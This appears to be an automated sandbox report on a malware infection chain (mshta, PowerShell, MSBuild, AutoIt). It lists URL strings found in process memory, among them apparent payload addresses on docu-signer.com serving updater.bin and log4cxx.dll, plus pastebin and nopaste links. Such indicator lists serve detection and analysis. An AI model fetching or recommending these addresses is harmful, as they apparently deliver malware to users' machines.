Source: mshta.exe, 0000000A.00000002.2571828453.000002743A41B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4
Source: powershell.exe	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4$global:?
Source: mshta.exe, 0000000A.00000002.2571828453.000002743A41B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4.
Source: mshta.exe, 0000000A.00000002.2569885759.00000274363C1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4...
Source: mshta.exe, 0000000A.00000002.2569885759.000002743632B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4...0
Source: mshta.exe, 0000000A.00000002.2552065652.0000026C33744000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4...y.IE5
Source: mshta.exe, 0000000A.00000002.2571828453.000002743A41B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4/
Source: mshta.exe, 0000000A.00000002.2571828453.000002743A41B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp474
Source: powershell.exe, 00000009.00000002.1311985386.000001E47D540000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4;7
Source: mshta.exe, 0000000A.00000002.2571828453.000002743A41B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4=
Source: mshta.exe, 0000000A.00000002.2571828453.000002743A41B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4==
Source: mshta.exe, 0000000A.00000002.2552065652.0000026C336D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4C:
Source: mshta.exe, 0000000A.00000002.2558478106.0000026C33A90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4DriverData=C:
Source: mshta.exe, 0000000A.00000002.2556884469.0000026C33A70000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4H
Source: mshta.exe, 0000000A.00000002.2552065652.0000026C336F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4K
Source: mshta.exe, 0000000A.00000002.2552065652.0000026C33744000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4LMEMh
Source: mshta.exe, 0000000A.00000002.2552065652.0000026C336F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4O
Source: mshta.exe, 0000000A.00000002.2552065652.0000026C336F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4P
Source: mshta.exe, 0000000A.00000002.2552065652.0000026C336F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4a
Source: mshta.exe, 0000000A.00000002.2569885759.000002743632B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4c
Source: mshta.exe, 0000000A.00000002.2571828453.000002743A41B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4gshtkwn
Source: mshta.exe, 0000000A.00000002.2571828453.000002743A41B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4https://docu-signer.com/api/uz/0912545164/index.m
Source: powershell.exe, 00000009.00000002.1311791660.000001E47B750000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4indows
Source: mshta.exe, 0000000A.00000002.2552065652.0000026C336F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4j
Source: mshta.exe, 0000000A.00000002.2552065652.0000026C33744000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4l
Source: mshta.exe, 0000000A.00000002.2571828453.000002743A41B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4osacu
Source: powershell.exe, 00000009.00000002.1307064773.000001E400001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4p
Source: mshta.exe, 0000000A.00000002.2571828453.000002743A41B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4string
Source: ssh.exe, 00000006.00000002.2549945050.000001C0F70D9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4svaIml9wb7ET1?Evo1s
Source: powershell.exe, 00000009.00000002.1311718513.000001E47B740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/index.mp4wf
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/lX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/loX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/log4X
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/log4cX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/log4cxX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/log4cxx.X
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/log4cxx.dX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/log4cxx.dlX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/log4cxx.dll
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/log4cxx.dllX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/log4cxxX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/logX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/uX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/upX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/updX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/updaX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/updatX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/updateX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/updater.X
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/updater.bX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/updater.biX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/updater.bin
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/updater.binX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164/updaterX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545164X
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/091254516X
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/09125451X
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912545X
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/091254X
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/09125X
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0912X
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/091X
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/09X
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/0X
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uz/X
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/api/uzX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.com/apiX
Source: powershell.exe, 00000010.00000002.2565392713.0000026A207BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://docu-signer.comX
Source: svchost.exe, 0000000D.00000003.1340593196.0000023B7EF19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000000D.00000003.1340593196.0000023B7EEC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000010.00000002.2565392713.0000026A1FB99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D721000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9CEF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.c
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9CEF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9CEF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D13D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D02D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D1BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com(
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0B0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9CEF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0D4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D029000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9CFDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0A4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D13D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D01D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D02D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D011000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D1BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0F9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/cpanel/index.js
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/cpanel/index.js&q=EgQILnu9GITIhLsGIjBWBBsBufMYwqtOw380evxq8HS7zh76erFkFxl8yM_dt
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D13D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/cpanel/index.js&q=EgQILnu9GIzIhLsGIjB3f8ZlXwQ9EDNrSunHscCKBtjTBi04vtVAdXQzDTijO
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/cpanel/index.js&q=EgQILnu9GJ3IhLsGIjBeq4R7hduOCFk6MqmpybyFegkVqEIli4aSEr98237Hf
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D13D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/cpanel/index.js&q=EgQILnu9GJXIhLsGIjDLabiJ-QiwsZEXYTtbpyHougaNin6iQvUlvUHrndvdI
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/cpanel/index.js&q=EgQILnu9GK7IhLsGIjCvxkyCiJUVF_Bzf-MafVcDRQeW2hNqrhgSEQJ_B_v93
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/cpanel/index.js&q=EgQILnu9GKXIhLsGIjB6N-nyx0b0z4U7ZaKA2d6pcpb2GYUb7KRWzOt-6jfck
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9CC0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D309000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/cpanel/index.js&q=EgQILnu9GL7IhLsGIjBA4Oq5LSboi3-Pl7bxdS0P0UbEVBVKyWh0K18E4kMMN
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/cpanel/index.js&q=EgQILnu9GLbIhLsGIjCxuDqUvtsLwShhV2mnWCZcd15X9Bz8fRSDQoVfsjclH
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9CEF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/cpanel/index.js&q=EgQILnu9GOLHhLsGIjDL2KuyuNUYTTIEgh6bMHZJeyNssyuqlBmCIJbKYgD6G
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D02D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/cpanel/index.js&q=EgQILnu9GOvHhLsGIjALg1n_oD6-x5qoLjA7snmDOgpvd0YRP2UlQi1KpcsQa
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D02D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/cpanel/index.js&q=EgQILnu9GPTHhLsGIjArISC-HyJoTc3_sjeSAiJbpKJK0RvOcYgC0U9H7A2Kw
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/cpanel/index.js&q=EgQILnu9GPzHhLsGIjCsmBBC6xv-VwuUAJpX0iHVNTcTDG8MgDVGCTHNyp8cP
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D13D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D06204dc2df8d40ca:TM%
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9CFDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D02D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D021000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D088e5e5b9e5485c9:TM%
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D101000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D3e51fb191164bd69:TM%
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0A8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3D5dc1da10416f5757:TM%
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Dd262cfe9897315fc:TM%
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9CC0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9CEF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9CE7F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Dd3fcac4c7e84428b:TM%
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Dd75c82985daeaff3:TM%
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D0D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D13D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3De0ca2cab5d4c45d9:TM%
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3De4ac8dc7236dfcc5:TM%
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D062000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D0CC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Deaae9950a8608d92:TM%
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9CFDF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D02D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D015000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/cpanel/index.js?google_abuse=GOOGLE_ABUSE_EXEMPTION%3DID%3Df40bf7fd73ae2227:TM%
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9CEF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/index.js:
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9CEF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com/a/index.jsp
Source: mshta.exe, 0000000A.00000002.2552065652.0000026C33799000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: powershell.exe, 00000010.00000002.2565392713.0000026A1FB99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nopaste.net
Source: powershell.exe, 00000010.00000002.2561671020.0000026A1DBA0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2560285149.0000026A1DAE4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2565392713.0000026A1FB99000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nopaste.net/SFHgtxFGtB
Source: powershell.exe, 00000010.00000002.2693907531.0000026A37C20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://nopaste.net/sfhgtxfgtb
Source: powershell.exe, 0000000E.00000002.2516521240.000001CAACA54000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2674622656.0000026A2F9E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: MSBuild.exe, 0000001E.00000002.1871655596.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/nGmga9WQ
Source: MSBuild.exe, 0000001E.00000002.1871655596.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/nGmga9WQPO
Source: powershell.exe, 00000010.00000002.2565392713.0000026A20F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2565392713.0000026A1FE02000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1694044915.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695557372.0000000005F29000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695431806.0000000005C64000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000002.1706860241.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000002.1873233315.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867382904.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867936106.0000000005CF4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1868040347.0000000005FB9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944653433.0000000005BC4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944862681.0000000005E89000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: MSBuild.exe, 0000001C.00000002.2564549704.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: AutoIt3.exe, 00000021.00000003.1944862681.0000000005E89000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: powershell.exe, 00000010.00000002.2565392713.0000026A20F23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2565392713.0000026A1FE02000.00000004.00000800.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1694044915.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695557372.0000000005F29000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000003.1695431806.0000000005C64000.00000004.00001000.00020000.00000000.sdmp, updater.exe, 0000001B.00000002.1706860241.0000000005E4F000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000002.1873233315.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867382904.0000000005EDF000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1867936106.0000000005CF4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 0000001D.00000003.1868040347.0000000005FB9000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944653433.0000000005BC4000.00000004.00001000.00020000.00000000.sdmp, AutoIt3.exe, 00000021.00000003.1944862681.0000000005E89000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/06
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9CEF3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: powershell.exe, 0000000E.00000002.2467331663.000001CA9D309000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D13D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D16C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D101000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2467331663.000001CA9D02D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com(
